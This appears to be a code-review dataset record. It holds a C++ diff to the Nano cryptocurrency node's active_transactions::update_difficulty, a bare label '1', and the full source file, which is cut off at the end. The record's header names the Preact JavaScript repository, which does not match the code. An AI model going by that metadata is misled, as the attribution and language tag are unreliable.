preactjs-preact
js
@@ -632,8 +632,13 @@ void nano::active_transactions::update_difficulty (std::shared_ptr<nano::block> { node.logger.try_log (boost::str (boost::format ("Block %1% was updated from difficulty %2% to %3%") % block_a->hash ().to_string () % nano::to_string_hex (existing_election->difficulty) % nano::to_string_hex (difficulty))); } - roots.get<tag_root> ().modify (existing_election, [difficulty](nano::conflict_info & info_a) { + roots.get<tag_root> ().modify (existing_election, [election = existing_election->election, &block_a, difficulty](nano::conflict_info & info_a) { info_a.difficulty = difficulty; + election->blocks[block_a->hash ()] = block_a; + if (election->status.winner->hash () == block_a->hash ()) + { + election->status.winner = block_a; + } }); adjust_difficulty (block_a->hash ()); }
1
#include <nano/lib/threading.hpp> #include <nano/node/active_transactions.hpp> #include <nano/node/election.hpp> #include <nano/node/node.hpp> #include <boost/format.hpp> #include <boost/variant/get.hpp> #include <numeric> using namespace std::chrono; nano::active_transactions::active_transactions (nano::node & node_a) : node (node_a), multipliers_cb (20, 1.), trended_active_difficulty (node_a.network_params.network.publish_threshold), solicitor (node_a.network, node_a.network_params.network), next_frontier_check (steady_clock::now ()), long_election_threshold (node_a.network_params.network.is_test_network () ? 2s : 24s), election_request_delay (node_a.network_params.network.is_test_network () ? 0s : 1s), election_time_to_live (node_a.network_params.network.is_test_network () ? 0s : 10s), min_time_between_requests (node_a.network_params.network.is_test_network () ? 25ms : 3s), min_time_between_floods (node_a.network_params.network.is_test_network () ? 50ms : 6s), min_request_count_flood (node_a.network_params.network.is_test_network () ? 0 : 2), thread ([this]() { nano::thread_role::set (nano::thread_role::name::request_loop); request_loop (); }) { assert (min_time_between_requests > std::chrono::milliseconds (node.network_params.network.request_interval_ms)); assert (min_time_between_floods > std::chrono::milliseconds (node.network_params.network.request_interval_ms)); nano::unique_lock<std::mutex> lock (mutex); condition.wait (lock, [& started = started] { return started; }); } nano::active_transactions::~active_transactions () { stop (); } void nano::active_transactions::search_frontiers (nano::transaction const & transaction_a) { // Limit maximum count of elections to start auto rep_counts (node.wallets.rep_counts ()); bool representative (node.config.enable_voting && rep_counts.voting > 0); bool half_princpal_representative (representative && rep_counts.half_principal > 0); /* Check less frequently for regular nodes in auto mode */ bool agressive_mode (half_princpal_representative || node.config.frontiers_confirmation == nano::frontiers_confirmation_mode::always); auto request_interval (std::chrono::milliseconds (node.network_params.network.request_interval_ms)); auto agressive_factor = request_interval * (agressive_mode ? 20 : 100); // Decrease check time for test network auto is_test_network = node.network_params.network.is_test_network (); int test_network_factor = is_test_network ? 1000 : 1; auto roots_size = size (); nano::unique_lock<std::mutex> lk (mutex); auto check_time_exceeded = std::chrono::steady_clock::now () >= next_frontier_check; lk.unlock (); auto max_elections = (node.config.active_elections_size / 20); auto low_active_elections = roots_size < max_elections; bool wallets_check_required = (!skip_wallets || !priority_wallet_cementable_frontiers.empty ()) && !agressive_mode; // Minimise dropping real-time transactions, set the number of frontiers added to a factor of the total number of active elections auto max_active = node.config.active_elections_size / 5; if (roots_size <= max_active && (check_time_exceeded || wallets_check_required || (!is_test_network && low_active_elections && agressive_mode))) { // When the number of active elections is low increase max number of elections for setting confirmation height. 
if (max_active > roots_size + max_elections) { max_elections = max_active - roots_size; } // Spend time prioritizing accounts to reduce voting traffic auto time_spent_prioritizing_ledger_accounts = request_interval / 10; auto time_spent_prioritizing_wallet_accounts = request_interval / 25; prioritize_frontiers_for_confirmation (transaction_a, is_test_network ? std::chrono::milliseconds (50) : time_spent_prioritizing_ledger_accounts, time_spent_prioritizing_wallet_accounts); size_t elections_count (0); lk.lock (); auto start_elections_for_prioritized_frontiers = [&transaction_a, &elections_count, max_elections, &lk, &representative, this](prioritize_num_uncemented & cementable_frontiers) { while (!cementable_frontiers.empty () && !this->stopped && elections_count < max_elections) { auto cementable_account_front_it = cementable_frontiers.get<tag_uncemented> ().begin (); auto cementable_account = *cementable_account_front_it; cementable_frontiers.get<tag_uncemented> ().erase (cementable_account_front_it); lk.unlock (); nano::account_info info; auto error = node.store.account_get (transaction_a, cementable_account.account, info); if (!error) { nano::confirmation_height_info confirmation_height_info; error = node.store.confirmation_height_get (transaction_a, cementable_account.account, confirmation_height_info); release_assert (!error); if (info.block_count > confirmation_height_info.height && !this->node.pending_confirmation_height.is_processing_block (info.head)) { auto block (this->node.store.block_get (transaction_a, info.head)); if (!this->start (block, true)) { ++elections_count; // Calculate votes for local representatives if (representative) { this->node.block_processor.generator.add (block->hash ()); } } } } lk.lock (); } }; start_elections_for_prioritized_frontiers (priority_cementable_frontiers); start_elections_for_prioritized_frontiers (priority_wallet_cementable_frontiers); next_frontier_check = steady_clock::now () + (agressive_factor / test_network_factor); } } void nano::active_transactions::post_confirmation_height_set (nano::transaction const & transaction_a, std::shared_ptr<nano::block> block_a, nano::block_sideband const & sideband_a, nano::election_status_type election_status_type_a) { if (election_status_type_a == nano::election_status_type::inactive_confirmation_height) { nano::account account (0); nano::uint128_t amount (0); bool is_state_send (false); nano::account pending_account (0); node.process_confirmed_data (transaction_a, block_a, block_a->hash (), sideband_a, account, amount, is_state_send, pending_account); node.observers.blocks.notify (nano::election_status{ block_a, 0, std::chrono::duration_cast<std::chrono::milliseconds> (std::chrono::system_clock::now ().time_since_epoch ()), std::chrono::duration_values<std::chrono::milliseconds>::zero (), 0, 1, 0, nano::election_status_type::inactive_confirmation_height }, account, amount, is_state_send); } else { auto hash (block_a->hash ()); nano::lock_guard<std::mutex> lock (mutex); auto existing (pending_conf_height.find (hash)); if (existing != pending_conf_height.end ()) { auto election = existing->second; if (election->confirmed && !election->stopped && election->status.winner->hash () == hash) { add_confirmed (existing->second->status, block_a->qualified_root ()); node.receive_confirmed (transaction_a, block_a, hash); nano::account account (0); nano::uint128_t amount (0); bool is_state_send (false); nano::account pending_account (0); node.process_confirmed_data (transaction_a, block_a, hash, sideband_a, account, 
amount, is_state_send, pending_account); election->status.type = election_status_type_a; election->status.confirmation_request_count = election->confirmation_request_count; node.observers.blocks.notify (election->status, account, amount, is_state_send); if (amount > 0) { node.observers.account_balance.notify (account, false); if (!pending_account.is_zero ()) { node.observers.account_balance.notify (pending_account, true); } } } pending_conf_height.erase (hash); } } } void nano::active_transactions::election_escalate (std::shared_ptr<nano::election> & election_l, nano::transaction const & transaction_l, size_t const & roots_size_l) { constexpr unsigned high_confirmation_request_count{ 128 }; // Log votes for very long unconfirmed elections if (election_l->confirmation_request_count % (4 * high_confirmation_request_count) == 1) { auto tally_l (election_l->tally ()); election_l->log_votes (tally_l); } /* * Escalation for long unconfirmed elections * Start new elections for previous block & source if there are less than 100 active elections */ if (election_l->confirmation_request_count % high_confirmation_request_count == 1 && roots_size_l < 100 && !node.network_params.network.is_test_network ()) { bool escalated_l (false); std::shared_ptr<nano::block> previous_l; auto previous_hash_l (election_l->status.winner->previous ()); if (!previous_hash_l.is_zero ()) { previous_l = node.store.block_get (transaction_l, previous_hash_l); if (previous_l != nullptr && blocks.find (previous_hash_l) == blocks.end () && !node.block_confirmed_or_being_confirmed (transaction_l, previous_hash_l)) { add (std::move (previous_l), true); escalated_l = true; } } /* If previous block not existing/not commited yet, block_source can cause segfault for state blocks So source check can be done only if previous != nullptr or previous is 0 (open account) */ if (previous_hash_l.is_zero () || previous_l != nullptr) { auto source_hash_l (node.ledger.block_source (transaction_l, *election_l->status.winner)); if (!source_hash_l.is_zero () && source_hash_l != previous_hash_l && blocks.find (source_hash_l) == blocks.end ()) { auto source_l (node.store.block_get (transaction_l, source_hash_l)); if (source_l != nullptr && !node.block_confirmed_or_being_confirmed (transaction_l, source_hash_l)) { add (std::move (source_l), true); escalated_l = true; } } } if (escalated_l) { election_l->update_dependent (); } } } void nano::active_transactions::request_confirm (nano::unique_lock<std::mutex> & lock_a) { assert (!mutex.try_lock ()); auto transaction_l (node.store.tx_begin_read ()); std::unordered_set<nano::qualified_root> inactive_l; /* * Confirm frontiers when there aren't many confirmations already pending and node finished initial bootstrap * In auto mode start confirm only if node contains almost principal representative (half of required for principal weight) */ // Due to the confirmation height processor working asynchronously and compressing several roots into one frontier, probably_unconfirmed_frontiers can be wrong { auto pending_confirmation_height_size (node.pending_confirmation_height.size ()); bool probably_unconfirmed_frontiers (node.ledger.cache.block_count > node.ledger.cache.cemented_count + roots.size () + pending_confirmation_height_size); bool bootstrap_weight_reached (node.ledger.cache.block_count >= node.ledger.bootstrap_weight_max_blocks); if (node.config.frontiers_confirmation != nano::frontiers_confirmation_mode::disabled && bootstrap_weight_reached && probably_unconfirmed_frontiers && 
pending_confirmation_height_size < confirmed_frontiers_max_pending_cut_off) { lock_a.unlock (); search_frontiers (transaction_l); lock_a.lock (); } } auto const now (std::chrono::steady_clock::now ()); // Any new election started from process_live only gets requests after at least 1 second auto cutoff_l (now - election_request_delay); // Elections taking too long get escalated auto long_election_cutoff_l (now - long_election_threshold); // The lowest PoW difficulty elections have a maximum time to live if they are beyond the soft threshold size for the container auto election_ttl_cutoff_l (now - election_time_to_live); // Rate-limitting floods auto const flood_cutoff (now - min_time_between_floods); // Rate-limitting confirmation requests auto const request_cutoff (now - min_time_between_requests); auto roots_size_l (roots.size ()); auto & sorted_roots_l = roots.get<tag_difficulty> (); size_t count_l{ 0 }; // Only representatives ready to receive batched confirm_req solicitor.prepare (node.rep_crawler.representatives (node.network_params.protocol.tcp_realtime_protocol_version_min)); /* * Loop through active elections in descending order of proof-of-work difficulty, requesting confirmation * * Only up to a certain amount of elections are queued for confirmation request and block rebroadcasting. The remaining elections can still be confirmed if votes arrive * Elections extending the soft config.active_elections_size limit are flushed after a certain time-to-live cutoff * Flushed elections are later re-activated via frontier confirmation */ for (auto i = sorted_roots_l.begin (), n = sorted_roots_l.end (); i != n; ++i, ++count_l) { auto election_l (i->election); auto root_l (i->root); if (election_l->confirmed || (election_l->confirmation_request_count != 0 && !node.ledger.could_fit (transaction_l, *election_l->status.winner))) { election_l->stop (); } // Erase finished elections if ((election_l->stopped)) { inactive_l.insert (root_l); } // Drop elections else if (count_l >= node.config.active_elections_size && election_l->election_start < election_ttl_cutoff_l && !node.wallets.watcher->is_watched (root_l)) { election_l->stop (); inactive_l.insert (root_l); add_dropped_elections_cache (root_l); } // Attempt obtaining votes else if (election_l->skip_delay || election_l->election_start < cutoff_l) { // Broadcast the winner when elections are taking longer to confirm if (election_l->confirmation_request_count >= min_request_count_flood && election_l->last_broadcast < flood_cutoff && !solicitor.broadcast (*election_l)) { election_l->last_broadcast = now; } // Rate-limited requests for confirmation else if (election_l->last_request < request_cutoff && !solicitor.add (*election_l)) { ++election_l->confirmation_request_count; election_l->last_request = now; } // Escalate long election after a certain time and number of requests performed if (election_l->confirmation_request_count > 4 && election_l->election_start < long_election_cutoff_l) { election_escalate (election_l, transaction_l, roots_size_l); } } } lock_a.unlock (); solicitor.flush (); lock_a.lock (); // Erase inactive elections for (auto i (inactive_l.begin ()), n (inactive_l.end ()); i != n; ++i) { auto root_it (roots.get<tag_root> ().find (*i)); if (root_it != roots.get<tag_root> ().end ()) { root_it->election->clear_blocks (); root_it->election->clear_dependent (); roots.get<tag_root> ().erase (root_it); } } } void nano::active_transactions::request_loop () { nano::unique_lock<std::mutex> lock (mutex); started = true; lock.unlock (); 
condition.notify_all (); // The wallets and active_transactions objects are mutually dependent, so we need a fully // constructed node before proceeding. this->node.node_initialized_latch.wait (); lock.lock (); while (!stopped && !node.flags.disable_request_loop) { // Account for the time spent in request_confirm by defining the wakeup point beforehand const auto wakeup_l (std::chrono::steady_clock::now () + std::chrono::milliseconds (node.network_params.network.request_interval_ms)); update_active_difficulty (lock); request_confirm (lock); // Sleep until all broadcasts are done, plus the remaining loop time if (!stopped) { condition.wait_until (lock, wakeup_l, [&wakeup_l, &stopped = stopped] { return stopped || std::chrono::steady_clock::now () >= wakeup_l; }); } } } void nano::active_transactions::prioritize_account_for_confirmation (nano::active_transactions::prioritize_num_uncemented & cementable_frontiers_a, size_t & cementable_frontiers_size_a, nano::account const & account_a, nano::account_info const & info_a, uint64_t confirmation_height) { if (info_a.block_count > confirmation_height && !node.pending_confirmation_height.is_processing_block (info_a.head)) { auto num_uncemented = info_a.block_count - confirmation_height; nano::lock_guard<std::mutex> guard (mutex); auto it = cementable_frontiers_a.get<tag_account> ().find (account_a); if (it != cementable_frontiers_a.get<tag_account> ().end ()) { if (it->blocks_uncemented != num_uncemented) { // Account already exists and there is now a different uncemented block count so update it in the container cementable_frontiers_a.get<tag_account> ().modify (it, [num_uncemented](nano::cementable_account & info) { info.blocks_uncemented = num_uncemented; }); } } else { assert (cementable_frontiers_size_a <= max_priority_cementable_frontiers); if (cementable_frontiers_size_a == max_priority_cementable_frontiers) { // The maximum amount of frontiers stored has been reached. Check if the current frontier // has more uncemented blocks than the lowest uncemented frontier in the collection if so replace it. 
auto least_uncemented_frontier_it = cementable_frontiers_a.get<tag_uncemented> ().end (); --least_uncemented_frontier_it; if (num_uncemented > least_uncemented_frontier_it->blocks_uncemented) { cementable_frontiers_a.get<tag_uncemented> ().erase (least_uncemented_frontier_it); cementable_frontiers_a.get<tag_account> ().emplace (account_a, num_uncemented); } } else { cementable_frontiers_a.get<tag_account> ().emplace (account_a, num_uncemented); } } cementable_frontiers_size_a = cementable_frontiers_a.size (); } } void nano::active_transactions::prioritize_frontiers_for_confirmation (nano::transaction const & transaction_a, std::chrono::milliseconds ledger_accounts_time_a, std::chrono::milliseconds wallet_account_time_a) { // Don't try to prioritize when there are a large number of pending confirmation heights as blocks can be cemented in the meantime, making the prioritization less reliable if (node.pending_confirmation_height.size () < confirmed_frontiers_max_pending_cut_off) { size_t priority_cementable_frontiers_size; size_t priority_wallet_cementable_frontiers_size; { nano::lock_guard<std::mutex> guard (mutex); priority_cementable_frontiers_size = priority_cementable_frontiers.size (); priority_wallet_cementable_frontiers_size = priority_wallet_cementable_frontiers.size (); } nano::timer<std::chrono::milliseconds> wallet_account_timer; wallet_account_timer.start (); if (!skip_wallets) { // Prioritize wallet accounts first { nano::lock_guard<std::mutex> lock (node.wallets.mutex); auto wallet_transaction (node.wallets.tx_begin_read ()); auto const & items = node.wallets.items; if (items.empty ()) { skip_wallets = true; } for (auto item_it = items.cbegin (); item_it != items.cend (); ++item_it) { // Skip this wallet if it has been traversed already while there are others still awaiting if (wallet_ids_already_iterated.find (item_it->first) != wallet_ids_already_iterated.end ()) { continue; } nano::account_info info; auto & wallet (item_it->second); nano::lock_guard<std::recursive_mutex> wallet_lock (wallet->store.mutex); auto & next_wallet_frontier_account = next_wallet_id_accounts.emplace (item_it->first, wallet_store::special_count).first->second; auto i (wallet->store.begin (wallet_transaction, next_wallet_frontier_account)); auto n (wallet->store.end ()); nano::confirmation_height_info confirmation_height_info; for (; i != n; ++i) { auto const & account (i->first); if (!node.store.account_get (transaction_a, account, info) && !node.store.confirmation_height_get (transaction_a, account, confirmation_height_info)) { // If it exists in normal priority collection delete from there. 
auto it = priority_cementable_frontiers.find (account); if (it != priority_cementable_frontiers.end ()) { nano::lock_guard<std::mutex> guard (mutex); priority_cementable_frontiers.erase (it); priority_cementable_frontiers_size = priority_cementable_frontiers.size (); } prioritize_account_for_confirmation (priority_wallet_cementable_frontiers, priority_wallet_cementable_frontiers_size, account, info, confirmation_height_info.height); if (wallet_account_timer.since_start () >= wallet_account_time_a) { break; } } next_wallet_frontier_account = account.number () + 1; } // Go back to the beginning when we have reached the end of the wallet accounts for this wallet if (i == n) { wallet_ids_already_iterated.emplace (item_it->first); next_wallet_id_accounts.at (item_it->first) = wallet_store::special_count; // Skip wallet accounts when they have all been traversed if (std::next (item_it) == items.cend ()) { wallet_ids_already_iterated.clear (); skip_wallets = true; } } } } } nano::timer<std::chrono::milliseconds> timer; timer.start (); auto i (node.store.latest_begin (transaction_a, next_frontier_account)); auto n (node.store.latest_end ()); nano::confirmation_height_info confirmation_height_info; for (; i != n && !stopped; ++i) { auto const & account (i->first); auto const & info (i->second); if (priority_wallet_cementable_frontiers.find (account) == priority_wallet_cementable_frontiers.end ()) { if (!node.store.confirmation_height_get (transaction_a, account, confirmation_height_info)) { prioritize_account_for_confirmation (priority_cementable_frontiers, priority_cementable_frontiers_size, account, info, confirmation_height_info.height); } } next_frontier_account = account.number () + 1; if (timer.since_start () >= ledger_accounts_time_a) { break; } } // Go back to the beginning when we have reached the end of the accounts and start with wallet accounts next time if (i == n) { next_frontier_account = 0; skip_wallets = false; } } } void nano::active_transactions::stop () { nano::unique_lock<std::mutex> lock (mutex); if (!started) { condition.wait (lock, [& started = started] { return started; }); } stopped = true; lock.unlock (); condition.notify_all (); if (thread.joinable ()) { thread.join (); } lock.lock (); roots.clear (); } bool nano::active_transactions::start (std::shared_ptr<nano::block> block_a, bool const skip_delay_a, std::function<void(std::shared_ptr<nano::block>)> const & confirmation_action_a) { nano::lock_guard<std::mutex> lock (mutex); return add (block_a, skip_delay_a, confirmation_action_a); } bool nano::active_transactions::add (std::shared_ptr<nano::block> block_a, bool const skip_delay_a, std::function<void(std::shared_ptr<nano::block>)> const & confirmation_action_a) { auto error (true); if (!stopped) { auto root (block_a->qualified_root ()); auto existing (roots.get<tag_root> ().find (root)); if (existing == roots.get<tag_root> ().end () && confirmed_set.get<tag_root> ().find (root) == confirmed_set.get<tag_root> ().end ()) { auto hash (block_a->hash ()); auto election (nano::make_shared<nano::election> (node, block_a, skip_delay_a, confirmation_action_a)); uint64_t difficulty (0); error = nano::work_validate (*block_a, &difficulty); release_assert (!error); roots.get<tag_root> ().emplace (nano::conflict_info{ root, difficulty, difficulty, election }); blocks.emplace (hash, election); adjust_difficulty (hash); election->insert_inactive_votes_cache (hash); } } return error; } // Validate a vote and apply it to the current election if one exists nano::vote_code 
nano::active_transactions::vote (std::shared_ptr<nano::vote> vote_a) { // If none of the hashes are active, it is unknown whether it's a replay // In this case, votes are also not republished bool at_least_one (false); bool replay (false); bool processed (false); { nano::lock_guard<std::mutex> lock (mutex); for (auto vote_block : vote_a->blocks) { nano::election_vote_result result; if (vote_block.which ()) { auto block_hash (boost::get<nano::block_hash> (vote_block)); auto existing (blocks.find (block_hash)); if (existing != blocks.end ()) { at_least_one = true; result = existing->second->vote (vote_a->account, vote_a->sequence, block_hash); } else // possibly a vote for a recently confirmed election { add_inactive_votes_cache (block_hash, vote_a->account); } } else { auto block (boost::get<std::shared_ptr<nano::block>> (vote_block)); auto existing (roots.get<tag_root> ().find (block->qualified_root ())); if (existing != roots.get<tag_root> ().end ()) { at_least_one = true; result = existing->election->vote (vote_a->account, vote_a->sequence, block->hash ()); } else { add_inactive_votes_cache (block->hash (), vote_a->account); } } processed = processed || result.processed; replay = replay || result.replay; } } if (at_least_one) { if (processed) { node.network.flood_vote (vote_a); } return replay ? nano::vote_code::replay : nano::vote_code::vote; } else { return nano::vote_code::indeterminate; } } bool nano::active_transactions::active (nano::qualified_root const & root_a) { nano::lock_guard<std::mutex> lock (mutex); return roots.get<tag_root> ().find (root_a) != roots.get<tag_root> ().end (); } bool nano::active_transactions::active (nano::block const & block_a) { return active (block_a.qualified_root ()); } void nano::active_transactions::update_difficulty (std::shared_ptr<nano::block> block_a, boost::optional<nano::write_transaction const &> opt_transaction_a) { nano::unique_lock<std::mutex> lock (mutex); auto existing_election (roots.get<tag_root> ().find (block_a->qualified_root ())); if (existing_election != roots.get<tag_root> ().end ()) { uint64_t difficulty; auto error (nano::work_validate (*block_a, &difficulty)); (void)error; assert (!error); if (difficulty > existing_election->difficulty) { if (node.config.logging.active_update_logging ()) { node.logger.try_log (boost::str (boost::format ("Block %1% was updated from difficulty %2% to %3%") % block_a->hash ().to_string () % nano::to_string_hex (existing_election->difficulty) % nano::to_string_hex (difficulty))); } roots.get<tag_root> ().modify (existing_election, [difficulty](nano::conflict_info & info_a) { info_a.difficulty = difficulty; }); adjust_difficulty (block_a->hash ()); } } else if (opt_transaction_a.is_initialized ()) { // Only guaranteed to immediately restart the election if the new block is received within 60s of dropping it constexpr std::chrono::seconds recently_dropped_cutoff{ 60s }; if (find_dropped_elections_cache (block_a->qualified_root ()) > std::chrono::steady_clock::now () - recently_dropped_cutoff) { lock.unlock (); nano::block_sideband existing_sideband; auto hash (block_a->hash ()); auto existing_block (node.store.block_get (*opt_transaction_a, hash, &existing_sideband)); release_assert (existing_block != nullptr); nano::confirmation_height_info confirmation_height_info; release_assert (!node.store.confirmation_height_get (*opt_transaction_a, node.store.block_account (*opt_transaction_a, hash), confirmation_height_info)); bool confirmed = (confirmation_height_info.height >= existing_sideband.height); if 
(!confirmed && existing_block->block_work () != block_a->block_work ()) { uint64_t existing_difficulty; uint64_t new_difficulty; if (!nano::work_validate (*block_a, &new_difficulty) && !nano::work_validate (*existing_block, &existing_difficulty)) { if (new_difficulty > existing_difficulty) { // Re-writing the block is necessary to avoid the same work being received later to force restarting the election // The existing block is re-written, not the arriving block, as that one might not have gone through a full signature check existing_block->block_work_set (block_a->block_work ()); node.store.block_put (*opt_transaction_a, hash, *existing_block, existing_sideband); // Restart election for the upgraded block, previously dropped from elections lock.lock (); add (existing_block); } } } } } } void nano::active_transactions::adjust_difficulty (nano::block_hash const & hash_a) { assert (!mutex.try_lock ()); std::deque<std::pair<nano::block_hash, int64_t>> remaining_blocks; remaining_blocks.emplace_back (hash_a, 0); std::unordered_set<nano::block_hash> processed_blocks; std::vector<std::pair<nano::qualified_root, int64_t>> elections_list; double sum (0.); int64_t highest_level (0); int64_t lowest_level (0); while (!remaining_blocks.empty ()) { auto const & item (remaining_blocks.front ()); auto hash (item.first); auto level (item.second); if (processed_blocks.find (hash) == processed_blocks.end ()) { auto existing (blocks.find (hash)); if (existing != blocks.end () && !existing->second->confirmed && !existing->second->stopped && existing->second->status.winner->hash () == hash) { auto previous (existing->second->status.winner->previous ()); if (!previous.is_zero ()) { remaining_blocks.emplace_back (previous, level + 1); } auto source (existing->second->status.winner->source ()); if (!source.is_zero () && source != previous) { remaining_blocks.emplace_back (source, level + 1); } auto link (existing->second->status.winner->link ()); if (!link.is_zero () && !node.ledger.is_epoch_link (link) && link != previous) { remaining_blocks.emplace_back (link, level + 1); } for (auto & dependent_block : existing->second->dependent_blocks) { remaining_blocks.emplace_back (dependent_block, level - 1); } processed_blocks.insert (hash); nano::qualified_root root (previous, existing->second->status.winner->root ()); auto existing_root (roots.get<tag_root> ().find (root)); if (existing_root != roots.get<tag_root> ().end ()) { sum += nano::difficulty::to_multiplier (existing_root->difficulty, node.network_params.network.publish_threshold); elections_list.emplace_back (root, level); if (level > highest_level) { highest_level = level; } else if (level < lowest_level) { lowest_level = level; } } } } remaining_blocks.pop_front (); } if (!elections_list.empty ()) { double multiplier = sum / elections_list.size (); uint64_t average = nano::difficulty::from_multiplier (multiplier, node.network_params.network.publish_threshold); // Prevent overflow int64_t limiter (0); if (std::numeric_limits<std::uint64_t>::max () - average < static_cast<uint64_t> (highest_level)) { // Highest adjusted difficulty value should be std::numeric_limits<std::uint64_t>::max () limiter = std::numeric_limits<std::uint64_t>::max () - average + highest_level; assert (std::numeric_limits<std::uint64_t>::max () == average + highest_level - limiter); } else if (average < std::numeric_limits<std::uint64_t>::min () - lowest_level) { // Lowest adjusted difficulty value should be std::numeric_limits<std::uint64_t>::min () limiter = 
std::numeric_limits<std::uint64_t>::min () - average + lowest_level; assert (std::numeric_limits<std::uint64_t>::min () == average + lowest_level - limiter); } // Set adjusted difficulty for (auto & item : elections_list) { auto existing_root (roots.get<tag_root> ().find (item.first)); uint64_t difficulty_a = average + item.second - limiter; roots.get<tag_root> ().modify (existing_root, [difficulty_a](nano::conflict_info & info_a) { info_a.adjusted_difficulty = difficulty_a; }); } } } void nano::active_transactions::update_active_difficulty (nano::unique_lock<std::mutex> & lock_a) { assert (!mutex.try_lock ()); double multiplier (1.); if (!roots.empty ()) { auto & sorted_roots = roots.get<tag_difficulty> (); std::vector<uint64_t> active_root_difficulties; active_root_difficulties.reserve (std::min (sorted_roots.size (), node.config.active_elections_size)); size_t count (0); auto cutoff (std::chrono::steady_clock::now () - election_request_delay - 1s); for (auto it (sorted_roots.begin ()), end (sorted_roots.end ()); it != end && count++ < node.config.active_elections_size; ++it) { if (!it->election->confirmed && !it->election->stopped && it->election->election_start < cutoff) { active_root_difficulties.push_back (it->adjusted_difficulty); } } if (active_root_difficulties.size () > 10 || (!active_root_difficulties.empty () && node.network_params.network.is_test_network ())) { multiplier = nano::difficulty::to_multiplier (active_root_difficulties[active_root_difficulties.size () / 2], node.network_params.network.publish_threshold); } } assert (multiplier >= 1); multipliers_cb.push_front (multiplier); auto sum (std::accumulate (multipliers_cb.begin (), multipliers_cb.end (), double(0))); auto difficulty = nano::difficulty::from_multiplier (sum / multipliers_cb.size (), node.network_params.network.publish_threshold); assert (difficulty >= node.network_params.network.publish_threshold); trended_active_difficulty = difficulty; node.observers.difficulty.notify (trended_active_difficulty); } uint64_t nano::active_transactions::active_difficulty () { nano::lock_guard<std::mutex> lock (mutex); return trended_active_difficulty; } uint64_t nano::active_transactions::limited_active_difficulty () { return std::min (active_difficulty (), node.config.max_work_generate_difficulty); } // List of active blocks in elections std::deque<std::shared_ptr<nano::block>> nano::active_transactions::list_blocks () { std::deque<std::shared_ptr<nano::block>> result; nano::lock_guard<std::mutex> lock (mutex); for (auto & root : roots) { result.push_back (root.election->status.winner); } return result; } std::deque<nano::election_status> nano::active_transactions::list_confirmed () { nano::lock_guard<std::mutex> lock (mutex); return confirmed; } void nano::active_transactions::add_confirmed (nano::election_status const & status_a, nano::qualified_root const & root_a) { confirmed.push_back (status_a); auto inserted (confirmed_set.get<tag_sequence> ().push_back (root_a)); if (confirmed.size () > node.config.confirmation_history_size) { confirmed.pop_front (); if (inserted.second) { confirmed_set.get<tag_sequence> ().pop_front (); } } } void nano::active_transactions::erase (nano::block const & block_a) { nano::lock_guard<std::mutex> lock (mutex); auto root_it (roots.get<tag_root> ().find (block_a.qualified_root ())); if (root_it != roots.get<tag_root> ().end ()) { root_it->election->stop (); root_it->election->clear_blocks (); root_it->election->clear_dependent (); roots.get<tag_root> ().erase (root_it); node.logger.try_log 
(boost::str (boost::format ("Election erased for block block %1% root %2%") % block_a.hash ().to_string () % block_a.root ().to_string ())); } } bool nano::active_transactions::empty () { nano::lock_guard<std::mutex> lock (mutex); return roots.empty (); } size_t nano::active_transactions::size () { nano::lock_guard<std::mutex> lock (mutex); return roots.size (); } bool nano::active_transactions::publish (std::shared_ptr<nano::block> block_a) { nano::lock_guard<std::mutex> lock (mutex); auto existing (roots.get<tag_root> ().find (block_a->qualified_root ())); auto result (true); if (existing != roots.get<tag_root> ().end ()) { auto election (existing->election); result = election->publish (block_a); if (!result && !election->confirmed) { blocks.emplace (block_a->hash (), election); } } return result; } void nano::active_transactions::clear_block (nano::block_hash const & hash_a) { nano::lock_guard<std::mutex> guard (mutex); pending_conf_height.erase (hash_a); } // Returns the type of election status requiring callbacks calling later boost::optional<nano::election_status_type> nano::active_transactions::confirm_block (nano::transaction const & transaction_a, std::shared_ptr<nano::block> block_a) { auto hash (block_a->hash ()); nano::unique_lock<std::mutex> lock (mutex); auto existing (blocks.find (hash)); if (existing != blocks.end ()) { if (!existing->second->confirmed && !existing->second->stopped && existing->second->status.winner->hash () == hash) { existing->second->confirm_once (nano::election_status_type::active_confirmation_height); return nano::election_status_type::active_confirmation_height; } else { return boost::optional<nano::election_status_type>{}; } } else { return nano::election_status_type::inactive_confirmation_height; } } size_t nano::active_transactions::priority_cementable_frontiers_size () { nano::lock_guard<std::mutex> guard (mutex); return priority_cementable_frontiers.size (); } size_t nano::active_transactions::priority_wallet_cementable_frontiers_size () { nano::lock_guard<std::mutex> guard (mutex); return priority_wallet_cementable_frontiers.size (); } boost::circular_buffer<double> nano::active_transactions::difficulty_trend () { nano::lock_guard<std::mutex> guard (mutex); return multipliers_cb; } size_t nano::active_transactions::inactive_votes_cache_size () { nano::lock_guard<std::mutex> guard (mutex); return inactive_votes_cache.size (); } void nano::active_transactions::add_inactive_votes_cache (nano::block_hash const & hash_a, nano::account const & representative_a) { // Check principal representative status if (node.ledger.weight (representative_a) > node.minimum_principal_weight ()) { auto existing (inactive_votes_cache.get<nano::gap_cache::tag_hash> ().find (hash_a)); if (existing != inactive_votes_cache.get<nano::gap_cache::tag_hash> ().end () && !existing->confirmed) { auto is_new (false); inactive_votes_cache.get<nano::gap_cache::tag_hash> ().modify (existing, [representative_a, &is_new](nano::gap_information & info) { auto it = std::find (info.voters.begin (), info.voters.end (), representative_a); is_new = (it == info.voters.end ()); if (is_new) { info.arrival = std::chrono::steady_clock::now (); info.voters.push_back (representative_a); } }); if (is_new) { if (node.gap_cache.bootstrap_check (existing->voters, hash_a)) { inactive_votes_cache.get<nano::gap_cache::tag_hash> ().modify (existing, [](nano::gap_information & info) { info.confirmed = true; }); } } } else { inactive_votes_cache.get<nano::gap_cache::tag_arrival> ().emplace 
